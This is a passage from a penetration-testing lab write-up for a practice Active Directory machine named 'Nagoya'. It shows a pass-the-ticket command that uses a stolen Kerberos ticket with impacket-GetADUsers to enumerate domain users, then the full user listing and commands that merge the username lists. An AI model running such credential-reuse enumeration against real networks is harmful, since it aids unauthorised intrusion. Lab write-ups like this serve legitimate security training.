Username Extraction
Extracting domain users through thepass_the_ticket technique with one of the TGTs
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ KRB5CCNAME=andrea.hayes@nagoya.nagoya-industries.com.ccache impacket-GetADUsers NAGOYA-INDUSTRIES.COM/andrea.hayes@nagoya.nagoya-industries.com -k -no-pass -dc-ip $IP -all
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting machine hostname
[*] Querying NAGOYA for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator 2023-05-01 17:43:05.350716 2025-04-23 17:54:00.143010
Guest <never> <never>
krbtgt 2023-04-30 08:32:12.373718 <never>
svc_helpdesk 2023-04-30 09:31:06.190955 <never>
Matthew.Harrison 2023-04-30 09:36:19.368599 <never>
Emma.Miah 2023-04-30 09:36:19.632597 <never>
Rebecca.Bell 2023-04-30 09:36:19.831599 <never>
Scott.Gardner 2023-04-30 09:36:20.009597 <never>
Terry.Edwards 2023-04-30 09:36:20.227600 <never>
Holly.Matthews 2023-04-30 09:36:20.420599 <never>
Anne.Jenkins 2023-04-30 09:36:20.601597 <never>
Brett.Naylor 2023-04-30 09:36:20.859598 <never>
Melissa.Mitchell 2023-04-30 09:36:21.033598 <never>
Craig.Carr 2023-04-30 11:09:46.104171 2025-04-23 18:14:58.314888
Fiona.Clark 2023-04-30 11:09:30.666672 2025-04-23 18:13:46.486759
Patrick.Martin 2023-04-30 09:36:21.610601 <never>
Kate.Watson 2023-04-30 09:36:21.807596 <never>
Kirsty.Norris 2023-04-30 09:36:21.990597 <never>
Andrea.Hayes 2023-04-30 11:09:21.072932 2025-04-23 18:12:48.127409
Abigail.Hughes 2023-04-30 09:36:22.368596 <never>
Melanie.Watson 2023-04-30 09:36:22.570598 <never>
Frances.Ward 2023-04-30 09:36:22.756598 <never>
Sylvia.King 2023-04-30 09:36:22.937597 <never>
Wayne.Hartley 2023-04-30 09:36:23.122597 <never>
Iain.White 2023-04-30 09:36:36.909597 <never>
Joanna.Wood 2023-04-30 09:36:37.092594 <never>
Bethan.Webster 2023-04-30 09:36:37.284596 <never>
Elaine.Brady 2023-04-30 09:36:44.571599 <never>
Christopher.Lewis 2023-04-30 09:36:44.746596 <never>
Megan.Johnson 2023-04-30 09:36:44.937597 <never>
Damien.Chapman 2023-04-30 09:36:45.126596 <never>
Joanne.Lewis 2023-04-30 09:36:45.302599 <never>
svc_mssql 2023-04-30 09:45:33.288595 2024-08-02 04:59:53.706593
svc_tpl 2023-04-30 10:09:39.662392 2023-04-30 10:10:00.303012
svc_web 2023-04-30 10:44:10.505416 2023-04-30 10:44:52.771024 A number of additional domain users are discovered
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ sed -i -r 's/\s+//g' tmp.txt
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ sort tmp.txt users.txt | uniq > all_users.txtMerging all the user files into one; all_users.txt